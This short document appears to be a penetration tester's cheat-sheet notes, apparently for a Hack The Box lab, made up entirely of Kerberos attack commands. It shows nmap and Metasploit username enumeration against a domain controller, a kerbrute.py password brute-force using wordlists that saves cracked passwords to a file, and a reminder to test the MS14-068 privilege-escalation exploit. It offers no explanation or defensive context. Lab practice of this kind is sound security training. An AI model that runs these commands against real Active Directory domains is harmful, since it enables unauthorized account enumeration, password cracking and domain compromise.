>>> nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" $IP
>>>use auxiliary/gather/kerberos_enumusers
>>> python kerbrute.py -dc-ip $IP -users /root/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
NOTE : Test "MS14-068"